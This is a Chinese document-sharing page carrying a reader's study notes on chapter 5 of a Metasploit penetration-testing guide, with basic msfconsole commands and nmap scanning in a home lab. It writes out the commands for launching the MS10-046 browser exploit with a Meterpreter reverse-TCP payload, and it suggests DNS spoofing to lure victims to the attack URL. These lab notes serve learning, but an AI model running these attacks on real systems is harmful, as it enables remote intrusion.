收藏 分销(赏)

Metasploit渗透测试指南读书笔记第五章.doc

上传人:xrp****65 文档编号:6909551 上传时间:2024-12-23 格式:DOC 页数:10 大小:788KB 下载积分:10 金币
下载 相关 举报
Metasploit渗透测试指南读书笔记第五章.doc_第1页
第1页 / 共10页
Metasploit渗透测试指南读书笔记第五章.doc_第2页
第2页 / 共10页


点击查看更多>>
资源描述
唐僧笔记 Metasploit渗透测试指南读书笔记第五章 取经之路技术交流群:161810021 第五章 渗透攻击之旅 5.1渗透攻击基础 5.1.1 msf > show exploits 这个命令会显示Metasploit框架中所有可有的渗透攻击模块。 5.1.2 msf > show auxiliary 这个命令会显示所有的辅助模块以及它们的用途。在Metasploit中,辅助模块的用途非常广泛,它们可以是扫描器,拒绝服务攻击工具,fuzz测试器,以及其他类型的工具。 5.1.3 msf > show options 参数(options)是保证Metasploit框架中各个模块正确运行所需要的的各种设置。当你选择了一个模块,并输入show options后,会列出各种参数,没选择模块它会列出所有的全局参数 输入back返回到上一个状态 搜索(search),当你不知道模块路径时它就起作用了。 5.14 msf > show payloads 查看所有的活动状态的攻击载荷 这里我们选择 payload windows/shell/reverse_tcp Reverse_tcp(反弹式tcp连接) 5.15 msf > show targets 列出漏洞影响目标系统的类型。 注:0是自动攻击 5.1.6 info 使用info命令加上模块的名字来显示此模块的详细信息,参数说明以及所有可用的目标系统。(这没什么用,不多介绍了) 5.1.7 set和unset 模块中参数只有两个状态:已设置(set)或者未设置(unset)。 有些参数被标记为必填项(required)这样的参数必须经过手工设置并处于启用状态。 使用show options命令可用查看那些参数是必填。 使用set命令可以对某个参数进行设置(同时启用改参数) 使用unset命令可以禁用相关参数。 5.1.8 setg和unsetg 这两个命令能够对全局参数进行设置或清除。 5.1.9 save 在使用setg命令对全局参数进行设置后,可以使用save命令将当前的设置保存下来 5.2 你的第一次渗透攻击 第一步扫描,呵呵! 这里全部按照书上来会失败的,看吧! Traceroute does not support idle or connect scan 不支持连接扫描,但书上确实是这样扫描出来的。 那怎么办了??是不是就放弃了,呵呵!不。这里我们不要进入msf这 个框架扫描,直接在外面扫。 看见最下面一行么,likely 呵呵! MS08-067: VULNERABLE 这说明存在这个漏洞 下面我们来了解一下那个nmap的参数吧! - -sT 是指隐秘的TCP连接扫描(Stealth TCP connect) -sS 隐秘的TCP Syn扫描 -A 是指高级的操作系统探测功能(advance OS detection) -PO[protocol list]: IP Protocol Ping 列出开放的端口 --script=smb-check-vulns 调用nmap的插件 既然有漏洞,那我们就来尝试下,看看能不能拿下这台主机吧! 呵呵!知道这是为什么吗??这个刚刚我们保存的(5.1.9时save) 那我们就简单,设置一下参数吧! 这是参数的设置。 这里应该会不成功,因为我的虚拟机安装的是GHost的系统,它自带了一些补丁,08年的洞,这个补丁应该打上了。 如我预料,看最后一行,不能创建会话,是吧! 这里我拿另外一个漏洞吧!Ms10-046(Microsoft Windows Shell LNK Code Execution),这个可以我试过,呵呵! 不记得了找一下吧! 出来了。 msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 选择攻击模块 set PAYLOAD windows/meterpreter/reverse_tcp 攻击载荷,这里选择反弹式tcp连接 设置参数,运行攻击。 这个时候只要是有主机打开http://192.168.137.60:80/ 这个地址就有可能挂了。 看吧!打开浏览器输入网址就成了这样了,这说明成功。 我打开了两下,所有有两个会话。 看见了吧!这个主机挂了。 注:sessions -i 会话的id 这样就进去了。 有的我就没多写了,你们可以打问号就知道参数的意思了。 你可能会问,别人为什么要打开这个Url地址了,不打开不就没事么! 是的,不打开这个网址是没没事。但有一点你一定会打开网站,这点毋庸置疑 是吧!只要你打开网站你就挂了,这里就涉及到了dns欺骗。 Dns欺骗请看这里,我这就不多说了。 5.3 攻击一台Ubuntu主机 这里我就简单的说下,由于我的Ubuntu9.04这个ios文件不知道怎么回事,用不了。所以这个实验就不能做了,不过也不要紧。这个也很简单就是利用一个samba漏洞. 5.4 全端口攻击载荷:暴力猜解目标开放的端口 Metasploit会对所有可能的端口进行尝试,直到他发现其中一个是放行的,不过这么多端口可能要耗费点时间。 这里不知道我没看懂还是怎么回事,感觉没什么啊!书上就是说 LPORT 这个参数没有设置,默认就是1,指所有的端口 5.5资源文件 资源文件(resource files)是MSF终端内包涵一系列自动化命令的脚本文件。可以在MSF终端中使用resource命令载入资源文件,或者可以在操作系统的命令行环境中使用-r标志将资源文件作为MSF终端的一个参数专递进来运行。 这个感觉没啥用,所以就不做详细的介绍了。
展开阅读全文

开通  VIP会员、SVIP会员  优惠大
下载10份以上建议开通VIP会员
下载20份以上建议开通SVIP会员


开通VIP      成为共赢上传

当前位置:首页 > 百科休闲 > 其他

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        抽奖活动

©2010-2025 宁波自信网络信息技术有限公司  版权所有

客服电话:4009-655-100  投诉/维权电话:18658249818

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :微信公众号    抖音    微博    LOFTER 

客服